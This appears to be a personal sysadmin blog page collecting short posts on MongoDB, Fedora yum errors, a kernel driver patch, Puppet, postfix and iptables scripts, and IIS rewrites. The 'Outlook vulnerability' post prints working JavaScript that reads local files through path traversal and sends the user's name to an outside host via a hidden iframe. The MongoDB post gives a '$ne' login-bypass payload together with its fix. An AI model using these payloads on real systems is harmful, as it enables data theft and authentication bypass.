Jan 10

Mongodb is vulnerable to SQL injection in PHP at least

By jason mangodb No Comments »

Its a common misconception that as MongoDB does not use SQL it is not vulnerable to SQL injection attacks. PHP uses objects rather than SQL to pass queries to the MongoDB server; for example the following script selects an item form MongoDB where the username equals ‘bob’ and the password equals ‘password’.

$collection->find(array(

       "username" => $_GET['username'],

       "passwd" => $_GET['passwd']

));

This is equivalent to the SQL syntax

mysql_query("SELECT * FROM collection
       WHERE username=" . $_GET['username'] . ",
       AND passwd=" . $_GET['passwd'])

In a normal SQL injection attack we can replace either of the two input parameters with a string such that the SQL query always returns true. e.g.

login.php?username=admin&passwd=" OR 1 --

That wont work with MongoDB; however if we can pass in an object to the PHP MongoDB driver we could alter the query in a similar fashion. Luckily PHP provides us with a way to pass objects as GET or POST parameters:

login.php?username=admin&passwd[$ne]=1

This creates the MongoDB query

$collection->find(array(
     "username" => "admin",
     "passwd" => array("$ne" => 1)
));

Which is the equivalent to the following SQL statement which, unless the password is “1″ will always return true.

mysql_query("SELECT * FROM collection
    WHERE username="admin",
    AND passwd!=1

The solution is to ensure your variables are properly typed before they are passed into the MongoDB driver. The following code is not vulnerable to MongoDB injection:

$collection->find(array(
     "username" => (string)$_GET['username'],
     "passwd" => (string)$_GET['passwd']
));

Tagged with:
Dec 06

How to fix the “Cannot retrieve repository metadata (repomd.xml)” error in Fedora?

By jason Linux/Unix Oprating system No Comments »

The recently released Fedora 11(CentOS 5) Leonidas has some issues with it’s regular update process. Many users are getting a strange error which complains about the inability of the update system to retrieve the repository metadata, namely repomd.xml. You can see the error as attached in this inlet below:

Error: Cannot retrieve repository metadata (repomd.xml) for repository: fedora. Please verify its path and try again

When we tried to install Fedora 11(CentOS5) for the first time, we also faced a similar problem. A quick twitter search brought us to a conclusion that we were not alone. But a little tweaking of a few system files brought us back on track. In this article we tell you, how to go about resolving the problem in case you face it too.

  • You need to edit two of your repository files: /etc/yum.repos.d/fedora.repo and /etc/yum.repos.d/fedora-updates.repo. Now un-comment all the lines that start with  the term baseurl and place a comment before all lines that start with mirrorlist. This should be done for both the above files.

Now edit your /etc/hosts file and append the following to it’s contents:

80.239.156.215 mirrors.fedoraproject.org

OR you can close yum-updatesd daemon on runlevel 3

chkconfig level 3 yum-updatesd off

/etc/rc.d/init.d/yum-updatesd stop

Now try updating your system or installing any software via Yum. You will see, the error is now resolved and the error message is not shown anymore.

Tagged with:
Dec 06

how to fix “mptctldrivers/message/fusion/mptctl.c::mptctl_ioctl”

By jason Linux/Unix Oprating system No Comments »

on a Dell PowerEdge 2950 I am using the Centos 5.x packages for x86_64 powered by the
OpenVZ kernels.
After the last update to the (as of Centos 5.2) latest kernel
2.6.18-92.1.1.el5.028stab057.2
I got alerted by the same kernel ERROR messages shown in the dmesg output:
….
Fusion MPT base driver 3.04.05
Copyright (c) 1999-2007 LSI Corporation
Fusion MPT misc device (ioctl) driver 3.04.05
mptctl: Registered with Fusion MPT base driver
mptctl: /dev/mptctl @ (major,minor=10,220)
mptctldrivers/message/fusion/mptctl.c::mptctl_ioctl() @596 – ioc0 not found!
mptctldrivers/message/fusion/mptctl.c::mptctl_ioctl() @596 – ioc1 not found!
mptctldrivers/message/fusion/mptctl.c::mptctl_ioctl() @596 – ioc2 not found!
….
These error messages seem to get triggered by IOCTL operations on the
device /dev/mptctl; you can reproduce them by doing a
/usr/bin/srvadmin-services.sh restart
srvadmin-services.sh is part of the Dell Server Management software
(Vers-5.2_rev-A00_Apr-2007 for the PowerEdge 2950; to be installed optionally);
the process behind dsm_sa_datamgr32d seems to be the only reader/writer
of the device file:
[root@d2950]# fuser /dev/mptctl
/dev/mptctl: 19331 22642
[root@d2950]# ps -flp 19331 22642
F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD
5 S root 19331 1 0 78 0 – 34354 stext 11:49 ? 0:04 /opt/dell/srvadmin/dataeng/bin/dsm_sa_datamgr32d
5 S root 22642 19331 0 78 0 – 31537 – 11:49 ? 0:00 /opt/dell/srvadmin/dataeng/bin/dsm_sa_datamgr32d
When rebooting the box with the formerly used kernel (as of Centos 5.1):
2.6.18-53.1.6.el5.028stab053.6xen
I see in dmesg output:
Fusion MPT misc device (ioctl) driver 3.04.04
mptctl: Registered with Fusion MPT base driver
mptctl: /dev/mptctl @ (major,minor=10,220)
–> so the new kernel (2.6.18-92.1.1.el5.028stab057.2) comes with a
new driver release … inspecting/comparing the source files for
the kernel module mptctl.ko we see:
=====File: /usr/src/redhat/BUILD/ovzkernel-2.6.18-53.1.6.el5.028stab053.6/\
linux-2.6.18.x86_64/drivers/message/fusion/mptctl.c
=================SNIP-START==
static long
__mptctl_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
mpt_ioctl_header __user *uhdr = (void __user *) arg;
mpt_ioctl_header khdr;
int iocnum;
unsigned iocnumX;
int nonblock = (file->f_flags & O_NONBLOCK);
int ret;
MPT_ADAPTER *iocp = NULL;
dctlprintk(("mptctl_ioctl() called\n"));
if (copy_from_user(&khdr, uhdr, sizeof(khdr))) {
printk(KERN_ERR "%s::mptctl_ioctl() @%d – "
"Unable to copy mpt_ioctl_header data @ %p\n",
__FILE__, __LINE__, uhdr);
return -EFAULT;
}
ret = -ENXIO; /* (-6) No such device or address */
/* Verify intended MPT adapter – set iocnum and the adapter
* pointer (iocp)
*/
iocnumX = khdr.iocnum & 0xFF;
if (((iocnum = mpt_verify_adapter(iocnumX, &iocp)) < 0) ||
(iocp == NULL)) {
-> dctlprintk((KERN_ERR "%s::mptctl_ioctl() @%d – ioc%d not found!\n",
-> __FILE__, __LINE__, iocnumX));
return -ENODEV;
}
=================SNIP-END==
=====File: /usr/src/redhat/BUILD/ovzkernel-2.6.18-92.1.1.el5.028stab057.2/\
linux-2.6.18.x86_64/drivers/message/fusion/mptctl.c
=================SNIP-START==
static long
__mptctl_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
mpt_ioctl_header __user *uhdr = (void __user *) arg;
mpt_ioctl_header khdr;
int iocnum;
unsigned iocnumX;
int nonblock = (file->f_flags & O_NONBLOCK);
int ret;
MPT_ADAPTER *iocp = NULL;
if (copy_from_user(&khdr, uhdr, sizeof(khdr))) {
printk(KERN_ERR MYNAM "%s::mptctl_ioctl() @%d – "
"Unable to copy mpt_ioctl_header data @ %p\n",
__FILE__, __LINE__, uhdr);
return -EFAULT;
}
ret = -ENXIO; /* (-6) No such device or address */
/* Verify intended MPT adapter – set iocnum and the adapter
* pointer (iocp)
*/
iocnumX = khdr.iocnum & 0xFF;
if (((iocnum = mpt_verify_adapter(iocnumX, &iocp)) < 0) ||
(iocp == NULL)) {
-> printk(KERN_DEBUG MYNAM "%s::mptctl_ioctl() @%d – ioc%d not found!\n",
-> __FILE__, __LINE__, iocnumX);
return -ENODEV;
}
=================SNIP-END==
we see that the newer (Centos 5.2 release) release of the mptctl.c changed
the ‘dctlprintk()’ statement into a ‘printk()’ … this means that a formerly
ONLY when compiling with DEBUG FLAGS ON (i.e. the module Makefile contains:
CFLAGS_mptctl.o += -DMPT_DEBUG_IOCTL)
active debug message print statement got enabled per default … and now we
get a whole lot of messages … it is not clear whether __mptctl_ioctl() should
really be that verbose …
Finally, on our Centos powered box, I was able to compile a more silent mptctl.ko:
[root@d2950]# diff drivers/message/fusion/mptctl.c drivers/message/fusion/mptctl.c-original
595,607c595,596
< #ifdef _MeJ__wants__MPT_DEBUG_IOCTL
< /* MeJ 02-Oct-2008
< we want to get rid of a whole lot of kernel error messages like:
< mptctldrivers/message/fusion/mptctl.c::mptctl_ioctl() @596 – ioc0 not found!
< mptctldrivers/message/fusion/mptctl.c::mptctl_ioctl() @596 – ioc1 not found!
< …..
< i.e. we disable the error message … in former versions of mptctl.c this
< printk() was active only when compiled with:
< CFLAGS_mptctl.o += -DMPT_DEBUG_IOCTL
< */
< printk(KERN_DEBUG MYNAM "%s::mptctl_ioctl() @%d – ioc%d not found!\n",
< __FILE__, __LINE__, iocnumX);
< #endif

> printk(KERN_DEBUG MYNAM "%s::mptctl_ioctl() @%d – ioc%d not found!\n",
> __FILE__, __LINE__, iocnumX);
and after
make
srvadmin-services.sh stop
rmmod mptctl
mv /lib/modules/2.6.18-92.1.1.el5.028stab057.2/kernel/drivers/message/fusion/mptctl.ko \
/lib/modules/2.6.18-92.1.1.el5.028stab057.2/kernel/drivers/message/fusion/mptctl.ko-original
cp drivers/message/fusion/mptctl.ko \
/lib/modules/2.6.18-92.1.1.el5.028stab057.2/kernel/drivers/message/fusion/mptctl.ko
modprobe -a mptctl
srvadmin-services.sh start
the problem is fixed … opensource is simply great ;-))))
Last but not least: Thanks to all of you for providing such a great distro like Centos to the
community!

Tagged with:
Dec 01

Install puppet on CentOS5 64Bit

By jason Linux/Unix Oprating system No Comments »

A puppet is an inanimate object or representational figure animated or manipulated by an entertainer, who is called a puppeteer. It is used in puppetry, a play or a presentation that is a very ancient form of theatre.

There are many different varieties of puppets, and they are made of a wide range of materials, depending on their form and intended use. They can be extremely complex or very simple in their construction. They may even be found objects. As Oscar Wilde wrote, “There are many advantages in puppets. They never argue. They have no crude views about art. They have no private lives.

Start Install puppet

1. install ruby

yum install ruby ruby-rdoc

2.install puppet server

wget http://download.fedora.redhat.com/pub/epel/5/i386/epel-release-5-4.noarch.rpm

rpm -Uvh epel-release-5-4.noarch.rpm

yum install puppet-server

chkconfig –level 2345 puppetmaster on

3.modify /etc/hosts file

192.168.1.2           puppet.mydomain.com    puppet

192.168.1.3           web1.mydomain.com  web1

4.install puppet client

wget http://download.fedora.redhat.com/pub/epel/5/i386/epel-release-5-4.noarch.rpm

rpm -Uvh epel-release-5-4.noarch.rpm

yum install puppet

chkconfig –level 2345 puppet on

5. edit file /etc/puppet/manifests/site.pp  (server side) & start puppet server

# Create  “/tmp/testfile” if it doesn’t exist.
class test_class {
file { “/tmp/testfile”:
ensure => present,
mode => 644,
owner => root,
group => root
}
}

# tell puppet on which client to run the class
node web1 {
include test_class
}

service puppetmaster start

6. start client

/etc/init.d/puppet once –v

7. view no sign client on puppet server

puppetca –list

8. sign for puppet client on puppet server

puppetca –sign web1.mydomain.com

9. test

puppetd –server puppet.mydomain.com --test

 
Tagged with:
Nov 15

Multi-Master Replication Manager for MySQL

By jason Mysql Server No Comments »

MMM (Multi-Master Replication Manager for MySQL) is a set of flexible scripts to perform monitoring/failover and management of MySQL master-master replication configurations (with only one node writable at any time).

The toolset also has the ability to read balance standard master/slave configurations with any number of slaves, so you can use it to move virtual IP addresses around a group of servers depending on whether they are behind in replication.

The current version of this software is stable, but the authors would appreciate any comments, suggestions, bug reports about this version to make it even better. Current version 2.0 development is led by Pascal Hofmann. If you require support, advice or assistance with deployment, please contact Percona or Open Query.

Tagged with:
Nov 10

How to repair it when mongodb crash

By jason mangodb No Comments »

You can find fllow information in mongodb log

Thu Nov 10 23:17:42 [initandlisten] MongoDB starting : pid=19198 port=27017 dbpath=/data/db/ 64-bit host=localhost.localdomain
Thu Nov 10 23:17:42 [initandlisten] db version v2.0.1, pdfile version 4.5
Thu Nov 10 23:17:42 [initandlisten] git version:
                                  3a5cf0e2134a830d38d2d1aae7e88cac31bdd684
Thu Nov 10 23:17:42 [initandlisten] build info: Linux bs-linux64.10gen.cc 2.6.21.7-2.ec2.v1.2.fc8xen #1 SMP Fri Nov 20 17:48:28 EST 2009 x86_64
                                 BOOST_LIB_VERSION=1_41
Thu Nov 10 23:17:42 [initandlisten] options: { config: "etc/mongo.conf", dbpath:
                        "/data/db/", fork: "1", journal: "1", logpath: 
                        "/opt/wwh/mongo/logs/mongodb.log", maxConns: 200, port: 27017,
                        repair: true, repairpath: "/tmp", syncdelay: 30.0 }
                        **************
old lock file: /data/db/mongod.lock.  probably means unclean shutdown,
but there are no journal files to recover.
this is likely human error or filesystem corruption.
found 3 dbs.
see: http://dochub.mongodb.org/core/repair for more information
*************

Start Repair:

   Step 1: stop mongod & backup and delete mongodb.log

kill -2 `ps aux |grep mongod |grep -v grep |awk ‘{print $2}’`

rm –f mongodb.log

   Step 2: Dlete mongod process lock

rm –f /data/db/mongod.lock

   Step 3: Start Reapir mongod

bin/mongod –f etc/mongodb.conf –repair –repairpath /tmp

Tagged with:
Nov 09

Outlook vulnerability explain

By jason Application Security No Comments »

Send attenment demo.htm

Code:

  • <script>
  • xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");
  • xmlhttp.open("GET","../../../../../../../../../../../../../../boot.ini",false);
  • xmlhttp.send();
  • alert(xmlhttp.responseText);
  • </script>

    •  

    Information:

    <script>alert(document.URL)</script>

    Get dir info

    C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\OLKxxx

    Demo:

  • <script>
  • var path = document.URL;
  • var regx = /Settings\\(.*)\\Local/ var rs= regx.exec(path); username=rs[1];
  • iframe_dom("http://www.80vul.com/hackgame/xs-g0.php?username="+username);
  •  
  • function iframe_dom(script_filename) {
  •     var d = window.document;
  •     var newIframe = d.createElement('iframe');
  •     newIframe.src=script_filename;
  •     newIframe.style.width = 0;
  •     newIframe.style.height = 0;
  •     d.appendChild(newIframe);
  •     return false;
  • } </script>
    • Tagged with:
    Oct 26

    postfix queue clean script

    By jason Shell Script No Comments »

    usage:

        1.Delete all include test.com domain’s mail from queue

    #perl pfdel.pl @test.com

        2.Delete all include a@test.com mail address’s mail from queue

    #perl pfdel.pl a@test.com

        3.Script content

    #!/usr/bin/perl -w
#
# pfdel - deletes message containing specified address from
# Postfix queue. Matches either sender or recipient address.
#
# Usage: pfdel <email_address>
#

use strict;

# Change these paths if necessary.
my $LISTQ = "/usr/sbin/postqueue -p";
my $POSTSUPER = "/usr/sbin/postsuper";

my $email_addr = "";
my $qid = "";
my $euid = $>;

if ( @ARGV !=  1 ) {
	die "Usage: pfdel <email_address>\n";
} else {
	$email_addr = $ARGV[0];
}

if ( $euid != 0 ) {
        die "You must be root to delete queue files.\n";
}

open(QUEUE, "$LISTQ |") ||
  die "Can't get pipe to $LISTQ: $!\n";

my $entry = <QUEUE>;	# skip single header line
$/ = "";		# Rest of queue entries print on
			# multiple lines.
while ( $entry = <QUEUE> ) {
	if ( $entry =~ / $email_addr$/m ) {
		($qid) = split(/\s+/, $entry, 2);
		$qid =~ s/[\*\!]//;
		next unless ($qid);

		#
		# Execute postsuper -d with the queue id.
		# postsuper provides feedback when it deletes
		# messages. Let its output go through.
		#
		if ( system($POSTSUPER, "-d", $qid) != 0 ) {
			# If postsuper has a problem, bail.
			die "Error executing $POSTSUPER: error " .
			   "code " .  ($?/256) . "\n";
		}
	}
}
close(QUEUE);

if (! $qid ) {
	die "No messages with the address <$email_addr> " .
	  "found in queue.\n";
}

exit 0;
    Tagged with:
    Oct 24

    Drop probe ip by iptables

    By jason Shell Script No Comments »

    Modify crontab

    * * * * * root /home/cnscn/sh/ssh_scan_crontab.sh >/dev/null 2>&1

    ssh_scan_crontab.sh script

  • $ cat /home/cnscn/sh/ssh_scan_crontab.sh
  • #!/bin/bash
  • # Author http://jabin.cublog.cn
  • # Modify cnscn http://cnscn2008.cublog.cn
  • # Modify xinyv
  •  
  • #set timezone
  • export LC_ALL=UTC
  •  
  • # gather 1 minutes log from secure,count and drop it by iptables
  • SCANNER=$(awk 'BEGIN{ tm=strftime("%b %e %H:%M",systime()-60);}  $0 ~ tm && /Failed password/ && /ssh2/ {print $(NF-3)}' /var/log/secure |sort|uniq -c |awk '{print $1"="$2;}')
  •  
  •  
  • for i in $SCANNER
  • do
  • echo $i
  •        # get fialure number
  •        NUM=`echo $i|awk -F= '{print $1}'`
  •  
  •        # get ip address
  •        IP=`echo $i|awk -F= '{print $2}'`
  •  
  •        # drop and log
  •        if [ $NUM -gt 5 ] && [ -z "`/sbin/iptables -vnL INPUT|grep $IP`" ]
  •        then
  •                /sbin/iptables -I INPUT -s $IP -j DROP
  •                echo "/sbin/iptables -I INPUT -s $IP -j DROP" >> /home/cnscn/sh/ssh_scan_iptables.sh
  •                logger -i -t "ssh_scan_crontab" -f /var/log/messages "$IP($NUM)..."
  •        fi
  • done
  • #End of Script
  •  
  •  
  • .start it when system up
  • $ cat myiptables.sh
  • #!/bin/bash
  • #chkconfig: 345 85 15
  • #description: my iptables rules, which can auto run when system start
  •  
  • # This is a script
  • # Edit by liwei, cnscn
  • # establish a static firewall
  •  
  • #network interface
  • interdevice="eth0"
  •  
  • #port
  • #21       ftp
  • #15022    sshd
  • #25       smtp
  • #53       named
  • #80       http
  • #110      pop3
  •  
  • #Allow Access port
  • Open_ports="21 20 22 80"
  •  
  • #
  • Allow_ports="21 20 80 "
  •  
  • #clean old rules
  • iptables -F
  • iptables -X
  • iptables -t nat -F
  • iptables -t nat -X
  •  
  • #Add rule for drop bad ip
  • /home/cnscn/sh/ssh_scan_iptables.sh
  •  
  • #Allow My ip
  • /sbin/iptables -I INPUT -s 111.127.xxx.xxx -j ACCEPT
  •  
  • for eths in $interdevice ; do
  •  
  •   #
  •   #iptables -A INPUT -i ! $eths -j ACCEPT
  •  
  •   #Allow all access’s port(--dport)
  •   for Port in $Open_ports ; do
  •     iptables -A INPUT -i $eths -p tcp --dport $Port -j ACCEPT
  •     iptables -A INPUT -i $eths -p udp --dport $Port -j ACCEPT
  •   done
  •  
  •   #Deny spoof
  •   iptables -A INPUT -i $eths -p tcp -j REJECT --reject-with tcp-reset
  •   iptables -A INPUT -i $eths -p udp -j REJECT --reject-with icmp-port-unreachable
  • done
  •  
  • #forbidden ping
  • echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all
  •  
  • #End of Script
    • Tagged with:
    Oct 09

    Install IIS Rewrite and add domain 301 redirect rule

    By jason IIS Server No Comments »

    1. download IIS Rewrite

    2.unzip iis_urlrewirte.zip to special directory (example:c:\rewrite)

    3.Add iisapi for special site

    4.restart iis

    5.rewrite rule
       5.1domain.com redirect to www.domain.com

    # ISAPI_Rewrite 2.x 
    [ISAPI_Rewrite]
    # 3600 = 1 hour
    CacheClockRate 3600
    RepeatLimit 32
    RewriteCond Host: ^domain\.com$ RewriteRule (.*) http\://www\.domain\.com$1 [I,RP]

    # ISAPI_Rewrite 3.0
    [ISAPI_Rewrite] # 3600 = 1 hour
    CacheClockRate 3600
    RepeatLimit 32
    RewriteCond %{HTTP:Host} ^domain\.com$ RewriteRule (.*) http\://www\.domain\.com$1 [NC,R=301]

       5.2 let oldpage.html redirect to newpage.html

    # ISAPI_Rewrite 2.x
    [ISAPI_Rewrite] # 3600 = 1 hour
    CacheClockRate 3600
    RepeatLimit 32
    RewriteRule ^/oldpage.html$ http://domain.com/newpage.html[I,O,RP,L]

    # ISAPI_Rewrite 3.0 
    [ISAPI_Rewrite] # 3600 = 1 hour
    CacheClockRate 3600
    RepeatLimit 32 RewriteRule ^/oldpage.html$ http://domain.com/newpage.html[NC,L,R=301,O]

    6.Refrence

    http://www.isapirewrite.com/

    Tagged with:
    Previous Entries
    preload preload preload